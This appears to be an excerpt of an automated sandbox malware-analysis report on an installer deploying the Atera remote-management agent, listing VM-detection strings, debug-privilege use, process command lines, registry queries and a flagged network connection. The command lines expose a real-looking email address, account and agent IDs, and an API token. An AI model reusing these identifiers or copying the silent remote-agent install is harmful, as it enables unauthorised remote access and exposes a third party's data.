Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor0
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2549890793.000001F1633C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStopped-
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2281891177.00000150BEA95000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2508147012.000001F14A345000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2292508392.00000150D7AEB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2549890793.000001F1633C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2292508392.00000150D7AF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicshutdownv
Source: rundll32.exe, 0000003D.00000002.2638415815.00000000030EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635091236.00000000030EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2292508392.00000150D7AEB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2549890793.000001F1633C1000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: AgentPackageMonitoring.exe, 00000033.00000002.2696699490.00000256F2314000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll $
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: rundll32.exe, 00000011.00000002.1910631555.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2293365462.00000150D7B80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllff
Source: svchost.exe, 00000023.00000002.2944621683.0000018CCBE4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dSetPropValue.FriendlyName("VMware Virtual disk");
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual R
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2548326525.000001F163349000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStopped,n
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service0
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2291098978.00000150D7A40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStoppedX
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "Win32_Service.Name="vmicheartbeat"p^
Source: svchost.exe, 00000023.00000002.2946064407.0000018CCBEBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ppData\&@SetPropValue.Manufacturer("VMware");
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2292508392.00000150D7AEB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2549890793.000001F1633C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service0
Source: svchost.exe, 00000023.00000002.2946064407.0000018CCBEF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMware20,1NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: rundll32.exe, 00000004.00000002.1766160686.0000000002F16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: svchost.exe, 00000023.00000002.2945675886.0000018CCBEA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWts.digicert.comDigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt[
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,12
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2291956819.00000150D7A92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServicevmicvssvmicvssStoppedR
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB2E41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Tools
Source: AgentPackageAgentInformation.exe, 00000014.00000002.2038194012.0000028A6E3E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2761360886.000002517A7B6000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.3012686811.0000023072B5F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2373005329.000001C2EBD10000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2552013711.000001F163454000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2791521532.0000019F9BDA0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000031.00000002.3208734070.0000021F3DE16000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3065551701.0000011CCB6F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2281891177.00000150BEA95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceProvides a platform for communication between the virtual machine and the operating system running on the physical computer.Hyper-V Remote Desktop Virtualization ServicevmicrdvStoppedO
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2281891177.00000150BEA95000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2508147012.000001F14A345000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStopped
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2508147012.000001F14A345000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceProvides a platform for communication between the virtual machine and the operating system running on the physical computer.Hyper-V Remote Desktop Virtualization ServicevmicrdvStopped
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2292508392.00000150D7AEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStopped
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2216815750.00000247F80B2000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: get_IsVirtualMachine
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2292508392.00000150D7AEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStopped
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Win32_Service.Name="vmicvss"p^
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2292508392.00000150D7AEB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2549890793.000001F1633C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Win32_Service.Name="vmicshutdown"p^
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service0
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service0
Source: svchost.exe, 00000023.00000003.2205466004.0000018CCC123000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SPACES_PhysicalDisk{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2281891177.00000150BEA95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStopped
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service
Source: svchost.exe, 00000023.00000002.2945675886.0000018CCBEA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C2942FCE4D06663969F532E45D1Aec=C:\
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II2

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

36_2_00007FFDF0E91910

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

36_2_00007FFDF0E91910

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

36_2_00007FFDF0E91910

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

Code function: 36_2_00007FFDF0E87A84 GetProcessHeap,

36_2_00007FFDF0E87A84

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Process token adjusted: Debug

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

Code function: 36_2_00007FFDF0E8ACD4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

36_2_00007FFDF0E8ACD4

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 40.119.152.241 443

Source: C:\Windows\System32\msiexec.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@filosofiaclinicachapeco.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Of2eLIAR" /AgentId="dfb304ca-1bde-49cc-a755-fa31deeb53c5"	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent	Jump to behavior
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e2aff9ec-0443-4e2e-911d-1a87ff7f14f5" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "63f96359-1827-4d06-be75-18d92a7c1d16" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "d2b7b5a8-ee48-431a-b16e-4e13c856aa4f" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b0110d28-0ca9-4cdd-bf48-816b1c3482b4" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e532489e-e47a-4c00-92df-b85ef3f9c47f" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e532489e-e47a-4c00-92df-b85ef3f9c47f" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b7913a8a-f9c6-44d6-b153-cbae5eab311c" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f40b3a64-d934-4445-96c6-2f766d5210eb" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "7e966fca-5db5-4899-b235-235f60debc02" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f80e7fd7-093a-49ee-afe3-91d4df20447b" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "31ce45eb-a81e-4a65-8c03-ab37bcf781fe" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "5070f66e-f4af-405a-83ec-4c6f4d61e8fc" agent-api.atera.com/Production 443 or8ixLi90Mf "heartbeat" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Process created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe

Jump to behavior

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

Code function: 36_2_00007FFDF0E8739C cpuid

36_2_00007FFDF0E8739C

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIA89C.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIA89C.tmp-\AlphaControlAgentInstallation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIAB6C.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIAB6C.tmp-\AlphaControlAgentInstallation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIAB6C.tmp-\Newtonsoft.Json.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIC6C5.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIC6C5.tmp-\AlphaControlAgentInstallation.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
